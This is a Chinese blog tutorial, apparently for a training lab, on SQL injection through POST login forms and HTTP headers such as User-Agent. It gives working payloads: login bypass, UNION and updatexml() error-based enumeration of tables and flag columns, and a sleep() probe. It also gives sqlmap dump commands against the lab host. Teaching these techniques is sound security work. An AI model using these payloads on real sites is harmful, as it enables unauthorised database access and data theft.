SQL篇之POST注入和HEAD注入

最新推荐文章于 2024-07-17 12:32:24 发布
最新推荐文章于 2024-07-17 12:32:24 发布
阅读量538 收藏 3
点赞数 1
分类专栏: SQL 文章标签: sql 安全 web安全 渗透测试 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/120949610
版权

目录

一、POST注入介绍

POST注入高危点:

最经典的POST注入——万能密码:

 POST实战

手工注入 

Head注入介绍

HEAD实战 

==》账号:admin;密码:123456。

手工注入

如果文章对你有帮助,欢迎关注、点赞、收藏一键三连支持以下哦!

想要一起交流学习的小伙伴可以加zkaq222(备注CSDN,不备注通不过哦)进入学习,共同学习进步

为了更好的学习POST注入和HEAD注入,我们有必要理解SQL注入的原理

注入攻击的本质,是把用户输入的数据当做代码执行。

关键条件:

第一个是用户能够控制输入;

第二个是原本程序要执行的代码,拼接了用户输入的数据

一、POST注入介绍

POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别

在真实的站点上,POST注入往往比GET注入要多的多

POST注入高危点:

  • 登录框
  • 查询框
  • 等各种和数据库有交互的框

最经典的POST注入——万能密码

  • 'or 1=1#
  • 'or 1=1--

 POST实战

闭合:

' 闭合;

" 闭合;

')闭合;

")闭合等等;

手工注入 

1.判断注入点

'or 1=1 and -1=-1#     ==》登录成功 

'or 1=1 and -1=-2#     ==》登录失败 

==》在Username登录框存在注入点

2.判断当前页面字段总数

'or 1=1 order by 3#    ==》登录成功

'or 1=1 order by 4#    ==》登录失败

==》当前页面字段总数: 3

3.判断显示位

'or 1=2 union select 1,2,3#    

 ==》注入点是 2,3

4.查当前数据库

'or 1=2 union select 1,2,database()#

==》数据库名为 post_error

5.查表名

'or 1=2 union select 1,2,GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()#

==》两个表:flag和user

6.查列名

FLAG应该在flag表里;

'or 1=2 union select 1,2,GROUP_CONCAT(column_name) from information_schema.columns where table_schema=database() and table_name='flag'#

==》列名:Id和flag

7.查字段内容

FLAG应该在flag表里的flag字段里;

'or 1=2 union select 1,2,GROUP_CONCAT(flag) from flag#

 Salmap——POST注入:

--forms读取页面中POST传参的表单的传参名然后进行SQL注入

-r 读取数据包文件进行SQL注入,在注入处末尾可以打一个*号告诉Sqlmap测试哪个点

 --forms

sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-05/index.php --forms

==》注入成功

跑库名

sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-05/index.php --forms --dbs

跑表名

sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-05/index.php --forms -D post_error --tables

字段名

sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-05/index.php --forms -D post_error -T flag --columns

出数据

sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-05/index.php --forms -D post_error -T flag -C flag --dump

-r 

Burp抓包,为了方便在Sqlmap文件夹里创建文档1.txt然后把数据存放在里面;

POST /Pass-05/index.php HTTP/1.1
Host: inject2.lab.aqlab.cn:81
Content-Length: 45
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://inject2.lab.aqlab.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://inject2.lab.aqlab.cn:81/Pass-05/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
username=&password=&submit=%E7%99%BB%E5%BD%95

sqlmap.py -r 1.txt 

==》注入成功

然后跑库名(sqlmap.py -r 1.txt --dbs),表名,字段名和数据 跟--forms差不多

Head注入介绍

在传参的时候,将我们的数据构建在http头部。

就是当你登录时,网页可能会记录下你的ip之类的信息,方便下次访问,此时或许存在注入点。

注:需登录成功。

PHP 全局变量 - 超全局变量

PHP 中的许多预定义变量都是“超全局的”,这意味着它们在一个脚本的全部作用域中都可用。 

 如:

$_REQUEST (获取GET/POST/COOKIE)

COOKIE在新版本已经无法获取了 $_POST (获取POST传参)

$_GET (获取GET的传参)

$_COOKIE (获取COOKIE的值)

$_SERVER (包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组)

 $_SERVER功能很强大,如:

$_SERVER['HTTP_HOST'] 请求头信息中的Host内容,获取当前域名。

$_SERVER["REMOTE_ADDR"] 浏览网页的用户ip。

$_SERVER["HTTP_USER_AGENT"] 获取用户相关信息,包括用户浏览器、操作系统等信息

$_SERVER包含的信息:

updatexml() 

updatexml() 更新xml文档的函数 ;

语法:updatexml(目标xml内容,xml文档路径,更新的内容)

例如:updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) 

实际上这里是去更新了XML文档,但是我们在XML文档路径的位置里面写入了子查询,我们输入特殊字符,然后就因为不符合输入规则然后报错了

但是报错的时候他其实已经执行了那个子查询代码!

[0x7e 实际是是16进制,Mysql支持16进制,但是开头得写0x    0x7e是一个特殊符号,然后不符合路径规则报错]   ~ ~

select updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)

 ==》这样我们就实现了通过报错注入查询数据库名的目的

updatexml () 这个函数一般是配合and 或者是or 使用的,

他和联合查询不同,不需要在意什么字段数

 如:

select *from wlb where id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

但是要注意,and 情况下只要一个为False,就会判定是False,所以如果and前面的条件不成立的情况下,就不会执行之后的语句。

所以使用的时候建议使用or 某些没有回显盲注也可以用这个updatexml()做出来。

但是报错一般有长度限制,不能输出太长的数据,尽量不使用group_concat()。

 

HEAD实战 

HEAD头修改:

User-Agent;

Referer;

X-Forwarded-For等等

首先用Burp爆破密码:

==》账号:admin;密码:123456。

手工注入

需要用 ModHeader 插件:

修改UA头进行注入:

1.判断注入点

'or sleep(5),1)#

==》存在SQL注入。

2.查当前数据库

'or updatexml(1,concat(0x7e,(select database()),0x7e),1),1)#

==》当前数据库为head_error。

3.查表名

'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),1)#

==》表名为 flag_head。

4.查列名

'or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name="flag_head" limit 1,1)),1),1)#

==》列名为flag_h1。

5.查字段内容

'or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 1,1)),1),1)#

Sqlmap注入

Burp抓包,为了方便还是在Sqlmap文件夹里创建文档1.txt然后把数据存放在里面;

在存在注入点的地方打个*号

sqlmap.py -r 1.txt

 

 ==》注入成功

然后跑库名(sqlmap.py -r 1.txt --dbs),表名,字段名和数据;

跟上面的 --forms的POST注入类似;

 

 

 

 

渗透测试老鸟-九青
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
深入分析SQL注入攻击及安全防范
10-31
### 深入分析SQL注入攻击及安全防范 #### SQL注入攻击概述 SQL注入是一种常见的安全漏洞,利用这种漏洞,攻击者能够在目标系统的合法SQL语句中插入非法或额外的SQL代码,以此来操纵数据库执行非预期的操作。这类...
host头部注入漏洞--中危
qq_44504968的博客
03-23 2872
host头部注入漏洞--中危漏洞原理漏洞知识扩展漏洞验证情况一情况二修复方案 漏洞原理 为了方便获取网站域名,开发人员一般依赖于请求包中的Host首部字段。例如,在php里用_SERVER[“HTTP_HOST”]。但是这个Host字段值是不可信赖的(可通过HTTP代理工具篡改),如果应用程序没有对Host字段值进行处理,就有可能造成恶意代码的传入。 漏洞知识扩展 Host首部字段是HTTP/1.1新增的,旨在告诉服务器,客户端请求的主机名和端口号,主要用来实现虚拟主机技术。 运用虚拟主机技术,单个主机可
初识SQL注入万能语句’or 1=1#
热门推荐
wwwwxiaobai的博客
04-29 1万+
sql注入什么的也是挺有意思的,初识了SQL注入的万能语句’or 1=1# 我们在编写登陆过程一般都是这样的: 输入用户名:”username" 输入密码:“password" 当语句编写如下时: 当我们输入相应正确的用户名和密码时,就可以登陆进去,错误的,时无法登陆的。但是这个验证机制可以通过SQL语句来构造一个特殊的”字符串“通过验证。 当我们在用户名处输入' or 1=1#,密码随便写,就可...
渗透测试工具sqlmap基础教程
最新发布
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
SQL注入的本质
鱼的博客
07-27 1568
SQL注入的本质 注入攻击的本质: 把用户输入的数据当做代码执行。 两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据然后进行执行 针对SQL语句的注入,也可以理解为用户输入的数据当做SQL语句的代码执行 显错注入-联合查询(Mysql数据库)的基本流程 重要知识点: 通过系统自带库查询数据 通过系统自带库查询数据 Mysql在5.0以上版本加入了information_schema 这个系统自带库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息
sql注入原理
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-21 511
sql注入原理是什么:1)SQL注入概念及产生原因: 当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 2)SQL注入的本质: 把用户输入的数据当作代码来执行,违背了“数据与代码分离”的原则 3)SQL注入的两个关键点: 1,用户能控制输入的内容; 2,web应用把用户输入的内容带入到数据库执行;
’or 1=1# 初入SQL注入的万能语句
weixin_41607190的博客
09-23 3万+
噢,终于知道CTF里面的那些SQL注入题里面,每题基本都有 id=1’ 这个东西,然后就是一串语句后面加个 # 。 现在终于理解了。至于这个东西为什么叫万能语句,继续看吧。 在介绍之前,先介绍一下我们一般的登陆过程: 输入用户名:“username” 输入密码:“password” 但我们输入完了以后是怎么登陆进去的呢?每个程序都会有一些验证机制。说一种简单的,比如下面这种代码: sql=&am...
$_SERVER详解
lky_for_lucky的博客
12-16 1346
Brush $_SERVER详解 $_SERVER[‘HTTP_ACCEPT_LANGUAGE’]//浏览器语言 $_SERVER[‘REMOTE_ADDR’] //当前用户 IP 。 $_SERVER[‘REMOTE_HOST’] //当前用户主机名 $_SERVER[‘REQUEST_URI’] //URL $_SERVER[‘REMOTE_PORT’] //端口。 $_SERVER[‘SERVER_NAME’] //服务器主机的名称。 $_SERVER[‘PHP_SELF’]//正在执行脚本的文件名
php AJAX POST的使用实例代码
12-02
在本文中,我们将深入探讨如何使用PHP和AJAX进行POST请求。AJAX(Asynchronous JavaScript and XML)允许我们在不刷新整个网页的情况下与...请注意,实际应用中应考虑错误处理和安全性问题,例如防止SQL注入和XSS攻击。
PHP利用超级全局变量$_POST来接收表单数据的实例
12-18
1. **验证和过滤**:始终验证用户输入,避免SQL注入、跨站脚本(XSS)等安全问题。 2. **错误处理**:如果尝试访问不存在的`$_POST`键,将会生成一个警告,因此需要检查变量是否已设置。 3. **编码**:确保正确处理...
常见的四种POST 提交数据方式(小总结)
10-23
随着Web应用的安全性越来越受到重视,开发者还需要注意防止SQL注入、XSS以及其他常见的Web安全漏洞。 了解不同POST提交数据方式的特性和应用场景,有助于开发者更好地选择合适的方式进行数据传输,并且能够提高数据...
SQL注入原理
qq_43036356的博客
05-23 2428
SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
一文了解SQL注入基础概述相关知识
allintao的博客
02-27 195
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
解析SQL注入测试中为什么使用/'or 1=1呢?
langbin418的专栏
11-04 6384
为什么使用的是 or 1=1--呢?   让我们来看看其他例子中使用or 1=1--的重要性吧。有别于正常的登陆方式,使用这样的登陆方式可能得到正常登陆中不能得到的某些特殊信息。用一个链接中得到的ASP页来打比方:    在上面这条URL中,category是一个变量名,而food是赋予该变量的值。为了做到这些(链接成功),   这个ASP必须包含以下相关的代码(下面也是我们为了演示这
sql注入第13关------报错注入和联合注入
qq_45751902的博客
03-14 537
闭合符 ') or 1=1 # 结果没有回显,可以考虑延时注入,布尔盲注和报错注入 但是延时注入对于错误和正确没有时间区别,所以不能用 报错注入有回显,所以布尔盲注就不用了 admin') union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1)# 既然已经确定是报错注入和联合注入了,那么和前面的差不多了。 ...
皮卡丘靶场之sql注入
qq_43766053的博客
02-15 5944
1数字型注入post) 这里,我们首先随便输入选择一个数字,然后用burp suite 抓包,如下图: post传递的数据是:id=1&submit=%E6%9F%A5%E8%AF%A2,接下来方便观看,我使用hackbar进行,也可以直接在BP上进行修改. 1.首先验证是否存在漏洞,这里我们知道是数字型,所以可以直接输入 payload:id=1 or 1=1&submit=%E6%9F%A5%E8%AF% 2.然后就是order by 寻找列数,一般使用二分法去从寻找,这里我直接给出答
DVWA靶场SQL注入代码分析(小白笔记)
晚风挽着浮云的博客
10-19 970
SQL注入及代码分析 基本概念: SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 1:SQL注入代码分析: PHP代码分析 $result= mysql_query($getid)or die('<pre>'.mysql_error().'</pre...
SQL注入的原理及简单应用
qq_65240014的博客
07-25 180
关于sql注入的相关基础知识,以及基本的sql注入的方法,本文主要采用union联合查找方式对有回显的数据库进行注入
5天快速学习ASP基础:从Hello World到内置对象解析
<head><title>Hello World</title></head> ("Hello World")%> ``` 在这个例子中,`<% %>`之间的代码是ASP脚本,`Response.Write`是ASP内置对象`Response`的方法,用于向客户端浏览器输出内容。 ASP有六个主要的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值